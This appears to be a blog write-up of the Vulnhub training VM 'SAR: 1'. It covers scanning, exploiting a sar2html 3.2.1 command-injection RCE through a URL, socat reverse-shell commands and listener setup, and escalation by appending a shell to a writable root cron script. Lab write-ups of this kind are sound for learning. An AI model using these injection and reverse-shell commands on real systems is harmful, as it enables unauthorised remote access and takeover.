Sunday 11 April 2021

Vulnhub Writeup: SAR: 1

Vulnhub -

Vulnhub - SAR

SAR login screen


Sar is an OSCP-Like VM with the intent of gaining experience in the world of penetration testing.

You can download the box from vulnhub here.

Initial Scans

nmap -sn

Server is up on IP

sudo autorecon

Open Ports

Just a single port open

80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.29 ((Ubuntu))

80/tcp Apache httpd 2.4.29 ((Ubuntu))

Nikto shows /phpinfo.php exists.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -u -o root-raft-lg-files.log

gobuster files

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u -o root-dirlist-big.log -x php,html,txt,bak

robots.txt contains a single entry - sar2HTML


sar2html page

Version is shown on the homepage sar2html Ver 3.2.1. Looks like there is an RCE.

searchsploit sar2

Looks like it works!


Checking the ping works on local kali box

sudo tcpdump -vv -i eth1 icmp

ping callback

The output of the command is shown in the page source. Here I’ve just run cat /etc/passwd. Each line is in a seperate <option> tag.


Working reverse shell

socat tcp-connect: exec:/bin/sh,pty,stderr,setsid,sigint,sane

Full URL -;socat%20tcp-connect:,pty,stderr,setsid,sigint,sane

shell GET

full tty with bash

socat tcp-connect: exec:'bash -li',pty,stderr,setsid,sigint,sane

local listener (for full TTY)

socat file:`tty`,raw,echo=0 tcp-listen:1998
export TERM=xterm-256color

user.txt is readable as www-data


linpeas is showing a cron job that runs every 5 mins

cron job

which is in /etc/crontab

system wide crontab just calls which is writeable by www-data.

I’ll add the reverse shell to set up a listener and wait…

setting up reverse shell

and it works! Top tab in the image is running pspy64


Seems like a fairly straightforward machine. I learned about the socat reverse shell because there is no netcat -e or python binary (python3 is there so I could have used this.) socat is also a nice backup to python for upgrading to a full tty with password entry support for sudo. I also learned that /etc/crontab is the system wide crontab and a must check file!

Written with StackEdit.

No comments:

Post a Comment

Please be nice! :)

Nutanix CE 2.0 on ESXi AOS Upgrade Hangs

AOS Upgrade on ESXi from 6.5.2 to hangs. Issue I have tried to upgrade my Nutanix CE 2.0 based on ESXi to a newer AOS version for ...